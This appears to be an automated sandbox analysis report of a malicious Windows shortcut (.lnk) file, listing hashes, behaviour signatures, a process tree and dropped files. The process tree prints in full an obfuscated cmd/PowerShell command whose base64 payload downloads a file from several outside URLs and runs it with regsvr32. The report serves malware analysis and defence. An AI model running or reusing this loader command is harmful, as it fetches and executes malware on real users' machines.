Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:38

General

  • Target

    ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk

  • Size

    2KB

  • MD5

    e567fd6bd2ad541ea7cff36788a1cb04

  • SHA1

    335983d1da7118026ec9cb6befd1cbd3a84edf9b

  • SHA256

    ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b

  • SHA512

    fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 19 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:804
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD
          4⤵
            PID:1712

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\IwnMs\cHKEstjhfJ.uDD

      Filesize

      1KB

      MD5

      9e9b48ae75ae39fd45ebf6799c9668d8

      SHA1

      7ed5cac9a268359ac09719dbbf354a83c23b1236

      SHA256

      bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761

      SHA512

      c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv4tdx1o.gg5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/3672-0-0x00007FFF28EB3000-0x00007FFF28EB5000-memory.dmp

      Filesize

      8KB

    • memory/3672-1-0x000001CFDDAB0000-0x000001CFDDAD2000-memory.dmp

      Filesize

      136KB

    • memory/3672-11-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

      Filesize

      10.8MB

    • memory/3672-12-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

      Filesize

      10.8MB

    • memory/3672-13-0x000001CFDE760000-0x000001CFDEF06000-memory.dmp

      Filesize

      7.6MB

    • memory/3672-49-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

      Filesize

      10.8MB